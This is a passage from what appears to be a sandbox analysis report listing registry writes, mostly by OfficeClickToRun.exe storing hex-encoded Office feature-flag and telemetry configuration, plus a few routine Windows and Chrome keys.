3a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443656e74656e6e69616c53657276657232303133436f6e6e656374696f6e426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e434c502e5570646174655374617475734261724f6e50726f66696c65537769746368222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e43656e7472616c697a6564457874656e73696f6e536166657479436865636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e49524d2e5758505644697361626c654c6f616454656d706c617465734f6e426f6f74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e4973457874656e73696f6e496e4c697374557064617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e4d6f6e69746f72656446696c65457874656e73696f6e4c697374222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e50726f74656374696f6e536572766963652e4e657755784d6f64656c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e53686f756c6452756e436c6f75645365637572697479506f6c696379436865636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e5573654e6f526566436f756e74416d736953747265616d222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e436c6f7564222c20225622203a20227374643a3a77737472696e677c5075626c696322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e46617374465445222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4d53495442697a63686174416c6c6f776c697374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4d6f636861222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4f584f416c6c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e50657270657475616c4c6963656e7365222c20225622203a20227374643a3a77737472696e677c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e5365676d656e74222c20225622203a20227374643a3a77737472696e677c4e4f4e4652444322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e56657273696f6e506172746974696f6e222c20225622203a20227374643a3a77737472696e677c57696e3332416e64726f6964486f7422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e576f7264436f70696c6f74446f67666f6f64222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e416c6c6f775a65726f4c656e677468536561726368537472696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f436f727265637455492e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4275674669786573466f7252657472794661696c65645265717565737473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4c696d6974546f4f6e654175746f446973636f766572222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4f6e6c795573654874747073222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e426f6f7449646c655468726f74746c6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4275674669782e506572736f6e61436f6e74726f6c4261636b67726f756e64436f6c6f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4368616e6765476174652e44656c617943757272656e745549416374697665506c616365557064617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4372634261736564556964222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e43726974697175652e44697361626c65644c616e677561676573222c20225622203a20227374643a3a77737472696e677c6a612c7a6822207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e43726974697175652e4c6f67496e7465726e616c4e616d65416e645072696f72697479222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e456469746f72536572766963652e557365496e737472756d656e746174696f6e417069222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4765726d616e456e744469736162696c69747942696173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|4" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.11 = 41707056616c75655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657450726f6475637456616c75655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253686f756c645573654d6963726f736f66743336354272616e64696e675c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2254656e616e745c22203a207b205c224576656e74735c22203a207b205c22496e697454656e616e7449645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224e756c5c22203a207b205c225375624e616d657370616365735c22203a207b205c22466574636865725c22203a207b205c224576656e74735c22203a207b205c224765744e756c4f626a656374466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2246657463684d6f64656c46726f6d4f6c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224765744c6963656e73654665617475726573466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243726561746552657175657374426f64795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f64656c5c22203a207b205c224576656e74735c22203a207b205c224765744c6963656e736543617465676f72795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22476574416c6c4c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446573657269616c697a655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225061727365526177526573706f6e73655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243616e52756e46656174757265526573756c74735c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224d6f64655c22203a207b205c224576656e74735c22203a207b205c224765744d6f64655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224170695c22203a207b205c224576656e74735c22203a207b205c22437265617465526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e64526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656365697665526573706f6e73655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2247657453746f72616765506174685c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61644d6f64656c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22476574556e766572696669656453746f72616765506174685c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61644d6f64656c5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656e616d6546696c65546f55736555706461746564486173685c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2256616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2256616c696461746f725c22203a207b205c224576656e74735c22203a207b205c224d61746368696e67486172776172656449645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c22466c6f77735c22203a207b205c224576656e74735c22203a207b205c22536561726368466f72534341546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4d6f786965222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74466c61675c22203a203438383936207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4f6666696365222c20225622203a20227374643a3a77737472696e677c7b205c224c6f636b65645c22203a2066616c73652c205c225375624e616d657370616365735c22203a207b205c224e61747572616c4c616e67756167655c22203a207b205c224c6f636b65645c22203a2066616c73652c205c225375624e616d657370616365735c22203a207b205c224372697469717565735c22203a207b205c224c6f636b65645c22203a2066616c73652c205c224576656e74735c22203a207b205c2250726f636573734175676c6f6f704372697469717565735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f636573734175676c6f6f7041646443726974697175655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4f75746c6f6f6b222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224465736b746f705c22203a207b205c225375624e616d657370616365735c22203a207b205c2253796e635c22203a207b205c224576656e74735c22203a207b205c2253796e6350757267654f66666c696e654974656d735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2256696577735c22203a207b205c224576656e74735c22203a207b205c224872566965774c6f6164436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22566965774d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e506572736f6e616c697a6174696f6e222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2246696c65496e736967687443616368654d616e616765725c22203a207b205c224576656e74735c22203a207b205c2250757267654578706972656443616368655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225369676e616c50726f636573736f725c22203a207b205c224576656e74735c22203a207b205c2253656e645369676e616c5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e50726f6772616d6d6162696c697479222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2254656c656d657472795c22203a207b205c224576656e74735c22203a207b205c22446e61416464496e4c6f6164586c6c46696c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446e61416464496e4c6f616445787465726e616c446c6c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446e61416464496e4c6f6164446e6146696c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e43726173685c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22416464696e735c22203a207b205c224576656e74735c22203a207b205c22417070416464496e4c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22417070416464496e55736167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e446f634c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7465726e616c536574436f6e6e6563745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e5365637572697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436c70547279557067726164654c6162656c4661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c705c22203a207b205c224576656e74735c22203a207b205c224c6162656c55736167655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f7574636f6d6555736167655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f66666963654a534765744c6162656c44657461696c735c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22436c70506f6c696379466574636843616c6c4261636b537563636573735c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d616e6461746f72794c6162656c6c696e674469616c6f675c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c4765744c6162656c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c5365744c6162656c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c506f6c696379436f6d706c657465496e697469616c697a655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253656c6563744a757374696669636174696f6e4f7074696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253656e7369746976697479466c796f7574416e63686f72547261636b416e645265766f6b65427574746f6e436c69636b5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225265676973746572446f63756d656e745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2246657463684c6162656c7346726f6d5365727665725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657444656661756c744c6162656c49445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744c6162656c735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744f7574636f6d6573466f724c6162656c4368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f6e506f6c6963794d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f6e5265706c79466f72776172645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f70656e48656c7065725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f506f6c6963794d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f4c6162656c416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f46696c65416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6162656c696e67457870657269656e63655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224164644c6162656c4f627365727665725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656d6f76654c6162656c4f627365727665725c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c705c22203a207b205c224576656e74735c22203a207b205c22446b6550726f746563746564436f6e74656e745c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6163726f5c22203a207b205c224576656e74735c22203a207b205c22426c6f636b4d6163726f46726f6d496e7465726e6574506f6c69637953657474696e675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22456e636f756e74657265645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22456e61626c65645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2246696c65426c6f636b5c22203a207b205c224576656e74735c22203a207b205c2246696c65426c6f636b496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224f43585c22203a207b205c224576656e74735c22203a207b205c2254727573746564456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224e6f6e54727573746564456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22416363657373456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22426c6f636b6564657874656e73696f6e735c22203a207b205c224576656e74735c22203a207b205c2246696c65457874656e73696f6e4c69737446726f6d536572766963655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22536563757265526561646572486f73745c22203a207b205c224576656e74735c22203a207b205c224f70656e496e4f53525c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54617267657465644d6573736167696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224275736261725468656d6553656c656374696f6e5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54656c656d65747279222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436c69656e7453616d706c696e674f76657272696464656e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253797374656d4865616c74684d657461646174614e6574776f726b436f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224576656e7451756172616e74696e65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164586d6c52756c65735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2250726f6365737349646c6551756575654a6f625c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22466c7573684576656e744275666665725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2254656c656d6574727953656e74696e656c56616c75655c22203a207b205c224576656e74466c61675c22203a2030207d207d2c205c224c6f636b65645c22203a2066616c7365207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54656c6c4d65222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2254656c6c4d655741435c22203a207b205c224576656e74735c22203a207b205c225175657279526573706f6e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54657874222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c225265736f75726365436c69656e745c22203a207b205c224576656e74735c22203a207b205c22446573657269616c697a655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656164466f6e74456c656d656e74735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2250757267654d756c7469706c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561645265736f757263654d657461446174615c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2257726974655265736f757263654d657461446174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22474449417373697374616e745c22203a207b205c224576656e74735c22203a207b205c225265676973746572436c6f7564466f6e7443616c6c6261636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2248616e646c6543616c6c6261636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22466f6e744d616e6167657244657374727563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464436c6f7564466f6e745265736f757263655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22466f6e74537562737469747574696f6e5c22203a207b205c224576656e74735c22203a207b205c22436f6c6c656374466f6e74537562737469747574696f6e55736167655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e5472616e736c61746f72222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c2220 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceId = "0018000E55B401FA" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.1 = 6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e5175657279496d70726f76656d656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e5175657279496d70726f76656d656e74732e45434c4d756c746953656c656374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e436f6d62696e654261636b656e6444696d656e73696f6e436f6d6d616e6473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4175674c6f6f702e4c6963656e73654665617475726573456e61626c65644f72436865636b222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4175674c6f6f702e576f726b666c6f7744697361626c65642e5265706c6163654f626a656374576f726b666c6f77222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4358452e48696464656e466f6e74734d736f466f6e745069636b657257696e3332222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e416c6c6f7753657456616c756573576974686f7574457863656c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e4368616e6765476174652e46436c6561724d6f6e696b6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e436f6c6c656374536861706550726f7073427567466978222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e4d6170436861727459656c6c6f7744617461222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e5069766f744368617274496e7665727446696c6c427567466978222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e536c69646553686f7748696465546f6f6c74697073222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070564d61785265747279436f756e74222c20225622203a2022696e7433325f747c313422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070564d6178526574727954696d654c696d6974222c20225622203a2022696e7433325f747c363030303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070565265747279496e74657276616c222c20225622203a2022696e7433325f747c3230303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655265666163746f72656453687574646f776e50726f636573736573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734164646f6e222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734f6e557064617465427573696e657373222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734f6e55706461746550726f506c7573222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e4164646974696f6e616c4461746154797065456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e426c6f636b466565646261636b457870657269656e636542617365644f6e5072697661637953657474696e6773222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e426c6f636b537572766579457870657269656e636542617365644f6e5072697661637953657474696e6773222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e436f686572656e6365457870657269656e6365456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e446961676e6f73746963735341532e55706c6f6164657254797065222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e456e61626c65466565646261636b5632536368656d61222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e466565646261636b446973616d626967756174696f6e53637265656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e486f73746564466565646261636b5461736b50616e65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e486f73746564537572766579456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e536173466565646261636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446961676e6f73746963732e44697361626c654661737446696c746572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e414354522e5468726f74746c654361706163697479222c20225622203a2022696e7433325f747c313022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e414354522e5468726f74746c65496e74657276616c4d736563222c20225622203a2022696e7433325f747c3130303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4261636b7374616765496e6170704e61765632456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e49735265706c7954696d657374616d704c6f6767696e67456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e4a53476174652e4e657743617264426f7264657273222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e4a53476174652e50616e65546162466f6375734669786573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e50726f636573734368616e676573496e766f6b65456c7365506f7374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d736f2e4f757453706163652e446570726563617465536574496d6167654173796e63222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4f666669636553746172742e466978466f7241444f33393032343239222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4f757453706163652e536861726564576974684d652e44697361626c65446f63756d656e74735265717565737449665573696e674167674d7275222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e436865636b41637469766974794c6f67546f456e61626c654d656e74696f6e73222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e456e61626c655369746573467269656e646c7950617468222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486973746f72794c6567616379436c65616e7570456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486973746f7279556e696f6e466978456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486f6d65506167652e436f6c6c61707369626c65536c616273222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e496e4170704e61762e43726561746552656e616d6544656c657465222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4d736f2e4f666669636553746172742e466978466f7241444f333838363036375632222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4f44656c74612e53747265616d4d6f6465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e576f7069222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e4361636865457870697279496e4d696e222c20225622203a2022696e7433325f747c37323022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e436f6e666967496444656c696d69746572496e4c6f67222c20225622203a20227374643a3a77737472696e677c3b22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e436f6e6669674c6f67546172676574222c20225622203a20227374643a3a77737472696e677c64656661756c7422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e44697361626c65436f6e6669674c6f67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e456e61626c65536d61727